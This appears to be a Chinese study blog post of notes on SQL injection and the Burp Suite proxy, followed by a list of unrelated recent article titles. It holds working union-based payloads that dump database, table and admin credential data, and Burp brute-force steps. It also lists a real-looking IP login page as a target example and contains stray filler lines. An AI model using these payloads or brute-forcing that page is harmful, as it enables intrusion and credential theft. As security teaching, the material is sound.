SQL注入与burPsuit工具介绍
sql注入原理
- 原理:用户输入不可控,用户输入导致了sql语义发生了改变
- 用户输入不可控:网站不能控制普通用户的输入
- sql语义发生变化:
- 动态网页介绍:
- 网站数据请求
- 脚本语言:解释类语言,如,后端语言php/jsp/asp/aspx
- URL的构成
- 数据请求的方式
- GET:随着URL传输,传输数据量较小,不能传输铭感信息
- POST:在请求正文中传输,传输的数据量较大,可传输任何信息
- sql注入的类型
- 按数据类型分
- 字符型
- 数字型
- 安数据传输方式分
- GET型
- POST型
- 按数据类型分
- sql注入发生的位置:
- 演示网站
- 原理:用户输入不可控,用户输入导致了sql语义发生了改变
回显注入
回显注入的原理
sql注入后的结果会出现到网页页面上。
核心点就是union
sql语言回顾
增
- INSERT INTO table_name VALUES (value1,value2,value3,...);
- INSERT INTO table_name (column1,column2,column3,...) VALUES (value1,value2,value3,...);
删 DELETE FROM Websites WHERE name='Facebook' AND country='USA';
改
UPDATE table_name SET column1=value1,column2=value2,... WHERE some_column=some_value;
查
回显注入的流程
- 找数据输入点
- 找有数据输出
- 判断注入类型 使用单双引号、注释符判断
- 确认漏洞是否存在:1' or 1=1 和1' or 1=2
- 判断列数 1' order by 1
- 判断回显位置 0' union select 1
- 找当前数据库 0' union select database()
- 找所有数据库名0' union select group_concat(schema_name) from information_schema.schemata
- 找所有的表名:0' union select group_concat(table_name) from information_schema.tables where table_schema='grade'
- 找所有字段名:0' union select group_concat(column_name) from information_schema.columns where table_schema='grade' and table_name='admins'
- 获取数据:0' union select group_concat(username,'~',password) from admins
特殊的库表
- 数据库的结构:库--->表--->字段(列名)--->数据。
- 特殊库:information_schema----->整个DBMS数据库信息
- schemata--->存有所有的库名 schema_name
- tables------->存有所有表的信息 table_schema 库 table_name 表
- columns---->存有所有字段的信息 table_schema 库 table_name 表 column_name 字段
burpsuite
burpsuite的安装
burpsuite的功能介绍
专业版含有漏洞扫描的功能,社区版没有此功能
- 破解版不能保证自身电脑的安全型
核心功能:拦截数据包,并且篡改数据包
proxy:拦截数据包
forward:提交数据包
drop:丢弃数据包---数据包不会到达服务器
intercept:选择burpsuite的工作状态
- on:处于拦截状态
- off:处于不抓包状态----数据包直接提交到服务器
action:调用数据包处理工具
数据包状态
raw:完整的数据包
params:传输的数据
header:请求数据用表格的形式展示
hex:16进制展示底层数据。
HTTP history
- 展示拦截数据包的历史信息。
options:
proxy listeners:选择代理连接信息
- add:添加代理信息
- edit:编辑,修改代理信息,选中需要修改的代理条目------>点击edit----->弹框中修改IP或端口
- remove:删除代理信息,选中需删除的代理条目---->点击remove
intercept server response
作用:开启或关闭响应拦截状态
repeater
- 作用:数据包重放。
- 用处:
- 重放攻击
- sql注入\文件上传\XSS等绕过
intruder
作用是暴力破解
target展示出的是请求的服务的信息
positsions:选择暴力破解的点于破解方式
- sniper:破解一个地方
- Nattering ram:可破解多个地方,但破解的点数据一样
- pitch fork:可破解多个相关性的点
- cluster bomb:可破解多个点,且多个点之间没有任何联系
payloads:设置字典
payload sets:选择为那一个破解点设置字典
payload options:放置字典
- paste
- load:加载字典文件
- remove:删除字典条目
- clear:删除全部字典数据
- add:手工添加字典
啊实打实
burpsuite数据包操作
开代理
firefox开代理:菜单--->选项--->高级--->网络--->连接--->设置---->手动配置代理
(浏览的代理于burpsuite中设定的代理的ip源端口要一样)
阿斯顿
大苏打
burpsuite暴力破解
暴力破解的原理
- 枚举-----试一试
- 简单---原理操作简单
暴力破解的操作。
- 安装插件:extender--->Bapp store--->install
暴力破解的难点
- 效率低
- 对有效字典的要求较高
- 对算法要求较高
- 对设备要求较高
暴力破解优化
- 信息收集---社工:http://221.237.108.18:8090/tyjgl/login.jsp#
- 多线程
最新文章
- Codefroces 750D:New Year and Fireworks(BFS)
- springMVC-1
- 为什么我的SQL server 在附加数据库后,数据库总是变成了只读?
- [ZZ] Understanding 3D rendering step by step with 3DMark11 - BeHardware >;>; Graphics cards
- MVC 的HTTP请求
- 【转】android开发工具Eclipse,androidStudio,adt网盘下载--不错
- Day18 Django之路由系统、模板语言、Ajax、Model
- [前端笔记]第一篇:html
- NYoj 685 查找字符串
- 轻谈 return i++
- Linux-RED HAT6.8扩容
- Javascript学习--时钟
- 将centos_yum源更换为阿里云(官方文档)
- dba_segements 没有所有的表的信息
- JS监听浏览器的返回、后退、上一页按钮的事件方法
- Redhat Linux5.4/5.5/5.8/6.0/6.3 ISO镜像文件下载
- 四则运算之Right-BICEP单元测试
- javaweb 学习系列【转】
- selenium去掉下载弹窗
- [翻译]第二天 - Visual Studio 中的 .NET Core 模版一览